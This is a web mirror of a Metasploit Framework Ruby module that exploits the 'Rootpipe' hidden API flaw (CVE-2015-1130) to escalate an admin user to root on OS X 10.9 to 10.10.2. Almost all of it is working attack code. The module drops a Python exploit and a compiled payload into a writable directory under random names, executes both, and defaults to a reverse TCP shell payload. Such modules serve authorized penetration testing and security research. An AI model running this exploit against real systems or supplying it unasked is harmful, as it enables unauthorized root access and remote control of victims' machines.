Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/osx/local/rootpipe.rb
19778 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = GreatRanking

8


9
  include Msf::Post::File

10
  include Msf::Post::OSX::Priv

11
  include Msf::Post::OSX::System

12
  include Msf::Exploit::EXE

13
  include Msf::Exploit::FileDropper

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => 'Apple OS X Rootpipe Privilege Escalation',

20
        'Description' => %q{

21
          This module exploits a hidden backdoor API in Apple's Admin framework on

22
          Mac OS X to escalate privileges to root, dubbed "Rootpipe."

23


24
          This module was tested on Yosemite 10.10.2 and should work on previous versions.

25


26
          The patch for this issue was not backported to older releases.

27


28
          Note: you must run this exploit as an admin user to escalate to root.

29
        },

30
        'Author' => [

31
          'Emil Kvarnhammar', # Vulnerability discovery and PoC

32
          'joev',             # Copy/paste monkey

33
          'wvu'               # Meta copy/paste monkey

34
        ],

35
        'References' => [

36
          ['CVE', '2015-1130'],

37
          ['OSVDB', '114114'],

38
          ['EDB', '36692'],

39
          ['URL', 'https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x/']

40
        ],

41
        'DisclosureDate' => '2015-04-09',

42
        'License' => MSF_LICENSE,

43
        'Platform' => 'osx',

44
        'Arch' => ARCH_X64,

45
        'SessionTypes' => ['shell'],

46
        'Privileged' => true,

47
        'Targets' => [

48
          ['Mac OS X 10.9-10.10.2', {}]

49
        ],

50
        'DefaultTarget' => 0,

51
        'DefaultOptions' => {

52
          'PAYLOAD' => 'osx/x64/shell_reverse_tcp',

53
          'PrependSetreuid' => true

54
        },

55
        'Notes' => {

56
          'Reliability' => UNKNOWN_RELIABILITY,

57
          'Stability' => UNKNOWN_STABILITY,

58
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

59
        }

60
      )

61
    )

62


63
    register_options [

64
      OptString.new('PYTHON', [true, 'Python executable', '/usr/bin/python'])

65
    ]

66
    register_advanced_options [

67
      OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])

68
    ]

69
  end

70


71
  def base_dir

72
    datastore['WritableDir'].to_s

73
  end

74


75
  def check

76
    (ver? && is_admin?) ? CheckCode::Appears : CheckCode::Safe

77
  end

78


79
  def exploit

80
    if is_root?

81
      fail_with Failure::BadConfig, 'Session already has root privileges'

82
    end

83


84
    unless is_admin?

85
      fail_with Failure::NoAccess, "User is not in the 'admin' group, bailing."

86
    end

87


88
    if check != CheckCode::Appears

89
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'

90
    end

91


92
    unless writable? base_dir

93
      fail_with Failure::BadConfig, "#{base_dir} is not writable"

94
    end

95


96
    print_status("Writing exploit to `#{exploit_file}'")

97
    write_file(exploit_file, python_exploit)

98
    register_file_for_cleanup(exploit_file)

99


100
    print_status("Writing payload to `#{payload_file}'")

101
    write_file(payload_file, binary_payload)

102
    register_file_for_cleanup(payload_file)

103


104
    print_status('Executing exploit...')

105
    cmd_exec(sploit)

106
    print_status('Executing payload...')

107
    cmd_exec(payload_file)

108
  end

109


110
  def ver?

111
    Rex::Version.new(get_sysinfo['ProductVersion']).between?(

112
      Rex::Version.new('10.9'), Rex::Version.new('10.10.2')

113
    )

114
  end

115


116
  def sploit

117
    "#{datastore['PYTHON']} #{exploit_file} #{payload_file} #{payload_file}"

118
  end

119


120
  def python_exploit

121
    File.read(File.join(

122
      Msf::Config.data_directory, 'exploits', 'CVE-2015-1130', 'exploit.py'

123
    ))

124
  end

125


126
  def binary_payload

127
    Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)

128
  end

129


130
  def exploit_file

131
    @exploit_file ||= "#{base_dir}/#{Rex::Text.rand_text_alpha(8)}"

132
  end

133


134
  def payload_file

135
    @payload_file ||= "#{base_dir}/#{Rex::Text.rand_text_alpha(8)}"

136
  end

137
end

138


139